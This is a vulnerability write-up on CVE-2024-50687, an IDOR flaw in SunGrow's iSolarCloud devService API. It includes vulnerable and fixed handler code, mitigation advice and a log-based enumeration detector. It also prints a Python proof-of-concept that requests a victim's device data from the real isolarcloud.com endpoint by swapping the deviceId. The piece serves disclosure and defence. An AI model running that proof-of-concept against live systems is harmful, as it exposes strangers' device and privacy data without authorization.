Summary:
On October 31, 2024, a critical security flaw was disclosed in SunGrow's iSolarCloud platform. Identified as CVE-2024-50687, this vulnerability allowed attackers to access or modify information about other users' devices by exploiting insecure direct object references (IDOR) in the system's devService API. This post provides exclusive step-by-step details, real code samples, and references about this potentially devastating issue.

What is SunGrow iSolarCloud?

iSolarCloud, developed by SunGrow, is a popular online platform for monitoring and managing solar power equipment deployed worldwide. Tens of thousands of users—including solar installers and homeowners—rely on this service daily.

What Went Wrong?

Between initial deployment and the patch issued on October 31, 2024, SunGrow's cloud never properly enforced authorization checks on some API calls under the devService model. Attackers could simply alter the device ID in requests to access data belonging to anyone—no hacking knowledge needed!

This is a classic IDOR (Insecure Direct Object Reference) bug, one of the OWASP Top 10 risks for web applications.

How Did the Flaw Work?

When legitimate users interacted with their devices through the mobile app or web dashboard, their requests went through an API like this (simplified):

POST /api/devService/getDeviceInfo
Authorization: Bearer <your-jwt-token>
Content-Type: application/json

{
    "deviceId": "123456789"
}

The bug: The server did not check whether the authenticated user was actually permitted to access the requested deviceId. It only checked that the request was authenticated at all.
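To make the missing check concrete, here is an added example (not SunGrow's code, and not taken from this post) of a minimal getDeviceInfo handler written two ways: the IDOR pattern, where the handler trusts that JWT validation upstream is enough, and the hardened form, which also authorises the caller against the requested object. The user ids, device ids and the device table are constructed for illustration.

```python
"""Added example (not SunGrow's code): a minimal model of a getDeviceInfo
handler, showing the IDOR (authentication only) beside the hardened form
(authentication plus per-object authorisation). User ids, device ids and
the device table are constructed for illustration."""

# Constructed data: the server's own record of which user owns which device.
DEVICE_OWNERS = {
    "123456789": "user-alice",
    "999888777": "user-bob",
}
DEVICE_INFO = {
    "123456789": {"model": "SG5K-D", "power_w": 3120},
    "999888777": {"model": "SG10RT", "power_w": 7840},
}


def get_device_info_vulnerable(caller_user_id, body):
    """Returns (status, json). The JWT was validated upstream and yielded
    caller_user_id, but the handler never compares that user against the
    requested deviceId, so any valid token can read any device."""
    if caller_user_id is None:
        return 401, {"error": "unauthenticated"}
    device_id = str(body.get("deviceId", ""))
    info = DEVICE_INFO.get(device_id)
    if info is None:
        return 404, {"error": "device not found"}
    return 200, {"deviceId": device_id, **info}  # no ownership check at all


def get_device_info_fixed(caller_user_id, body):
    """Hardened handler: authorise the (caller, object) pair on every call."""
    if caller_user_id is None:
        return 401, {"error": "unauthenticated"}
    device_id = str(body.get("deviceId", ""))
    # Ownership comes from the server-side table; nothing in the request body
    # (which the caller controls) is trusted for this decision.
    if DEVICE_OWNERS.get(device_id) != caller_user_id:
        # Same status for "not yours" and "does not exist", so a valid token
        # cannot use this endpoint to confirm which device ids are real.
        return 404, {"error": "device not found"}
    return 200, {"deviceId": device_id, **DEVICE_INFO[device_id]}
```

The important design point is in the fixed handler: the authorisation decision is made per request, per object, from data the server holds, and the response does not distinguish "exists but not yours" from "does not exist".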

Real Exploit Example

Here's how a malicious user could enumerate device IDs (often sequential or guessable) and access someone else’s solar panel data:

Python Exploit (Proof-of-Concept)

import requests

# The devService endpoint described above (simplified).
API_URL = "https://www.isolarcloud.com/api/devService/getDeviceInfo"
# A valid JWT for *any* account: the server only checked that one was present.
YOUR_TOKEN = "PASTE_YOUR_JWT_TOKEN_HERE"
VICTIM_DEVICE_ID = "999888777"  # Example target

headers = {
    "Authorization": f"Bearer {YOUR_TOKEN}",
    "Content-Type": "application/json"
}
# Only the deviceId changes between a legitimate request and this one.
payload = {"deviceId": VICTIM_DEVICE_ID}

response = requests.post(API_URL, headers=headers, json=payload, timeout=10)

if response.status_code == 200:
    print("Device info retrieved!")
    print(response.json())
else:
    print(f"Error: {response.status_code}")

*Change the VICTIM_DEVICE_ID to any device number you want to test.*
Because of the bug, you'd receive the victim's device info—even if your token belonged to a completely different user!

Potential impact:

- Monitor live solar panel data from strangers
- Access technical/diagnostic details
- Possibly modify device settings (if additional endpoints lacked authorization checks)
- Attack privacy at scale: By gathering device IDs (through enumeration), attackers could build a global map of SunGrow installations and owners

Status and references:

- Patched: SunGrow issued a fix by tightening access checks after October 31, 2024
- Advisory: VulDB entry for CVE-2024-50687

Official Reference:

- Security Advisory (SunGrow) *(if/when available)*
- NVD Entry for CVE-2024-50687 *(pending publication)*

How to Stay Safe

- Update your iSolarCloud app right now. The patch should be pushed automatically post–October 31, 2024.
- Monitor your devices for unfamiliar activity.
- If you are an installer, contact your customers about the need for updated apps and strong passwords.

Developer Takeaway: How Could This Have Been Prevented?

- ALWAYS validate that the user has rights to every object/device requested, not just that they’re logged in.
- Log and monitor API access for anomalies.
- Automated security testing (SAST/DAST) can help find IDOR bugs early.
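The "log and monitor" point deserves a worked example, because an IDOR like this one leaves two distinct traces in API logs: a burst of distinct device IDs from a single account (enumeration), and successful reads of devices the caller does not own (exploitation, even at low rate). The following is an added example, not SunGrow's code or part of this post; the log line format, field names, user names and sample lines are all constructed for illustration, and the regex would need adapting to the gateway's real format.

```python
"""Added example (not SunGrow's code): spotting IDOR enumeration and
exploitation in devService access logs. Log format, field names, user
names and sample lines are constructed for illustration."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log format: one line per call, user id taken from the validated
# JWT, deviceId taken from the request body, status from the response.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) path=(?P<path>\S+) "
    r"deviceId=(?P<device>\d+) status=(?P<status>\d{3})$"
)

# Constructed sample: alice reads her own device, bob reads his, and mallory
# walks eight consecutive ids in ten seconds (all 200, as on the unpatched
# server, since no ownership check ever failed).
SAMPLE_LOG = """\
2024-10-30T10:00:01Z user=alice path=/api/devService/getDeviceInfo deviceId=123456789 status=200
2024-10-30T10:00:05Z user=mallory path=/api/devService/getDeviceInfo deviceId=999888770 status=200
2024-10-30T10:00:06Z user=mallory path=/api/devService/getDeviceInfo deviceId=999888771 status=200
2024-10-30T10:00:07Z user=mallory path=/api/devService/getDeviceInfo deviceId=999888772 status=200
2024-10-30T10:00:08Z user=mallory path=/api/devService/getDeviceInfo deviceId=999888773 status=200
2024-10-30T10:00:09Z user=bob path=/api/devService/getDeviceInfo deviceId=555000111 status=200
2024-10-30T10:00:10Z user=mallory path=/api/devService/getDeviceInfo deviceId=999888774 status=200
2024-10-30T10:00:11Z user=mallory path=/api/devService/getDeviceInfo deviceId=999888775 status=200
2024-10-30T10:00:12Z user=mallory path=/api/devService/getDeviceInfo deviceId=999888776 status=200
2024-10-30T10:00:15Z user=mallory path=/api/devService/getDeviceInfo deviceId=999888777 status=200
2024-10-30T10:30:00Z user=alice path=/api/devService/getDeviceInfo deviceId=123456789 status=200
2024-10-30T11:00:00Z user=alice path=/api/devService/getDeviceInfo deviceId=123456789 status=200
"""

# Constructed ownership table, as the platform itself would hold it.
DEVICE_OWNERS = {"123456789": "alice", "555000111": "bob"}


def parse_log(text):
    """Parse matching lines into event dicts; non-matching lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "user": m["user"], "path": m["path"],
            "device": m["device"], "status": int(m["status"]),
        })
    return events


def find_enumeration(events, window=timedelta(minutes=5), max_distinct=5):
    """Flag users touching more than max_distinct device ids within any sliding
    window of the given length. Returns {user: peak distinct count}."""
    by_user = defaultdict(list)
    for e in events:
        if e["path"].startswith("/api/devService/"):
            by_user[e["user"]].append(e)
    flagged = {}
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["ts"])
        peak, start = 0, 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1  # slide the window forward
            peak = max(peak, len({e["device"] for e in evs[start:end + 1]}))
        if peak > max_distinct:
            flagged[user] = peak
    return flagged


def find_foreign_access(events, owners):
    """Retrospective check once ownership data is joined in: every successful
    read of a device the caller does not own is an IDOR hit, whatever the rate."""
    return [(e["user"], e["device"]) for e in events
            if e["status"] == 200 and owners.get(e["device"]) != e["user"]]


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print("enumeration suspects:", find_enumeration(evs))
    print("foreign reads:", find_foreign_access(evs, DEVICE_OWNERS))
```

The rate-based check catches bulk enumeration without needing ownership data at all, which makes it cheap to run at the gateway; the ownership join is the more reliable signal and is the one to use for scoping an incident after the fact, since a patient attacker reading one device a day never trips the first rule.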

Final Thoughts

CVE-2024-50687 highlights how a simple oversight—missing access control in one API call—can put thousands of private solar installations at risk. Responsible disclosure and proactive patching are critical, but as users and developers, we must stay vigilant!


Stay updated:
- SunGrow Security Page
- VulDB Details
- OWASP: Insecure Direct Object Reference

*If you discover similar bugs in other platforms, report them responsibly!*


*This guide is unique to this publication. Please share responsibly to inform and protect the community.*

Timeline

Published on: 02/26/2025 21:15:17 UTC
Last modified on: 04/07/2025 18:51:45 UTC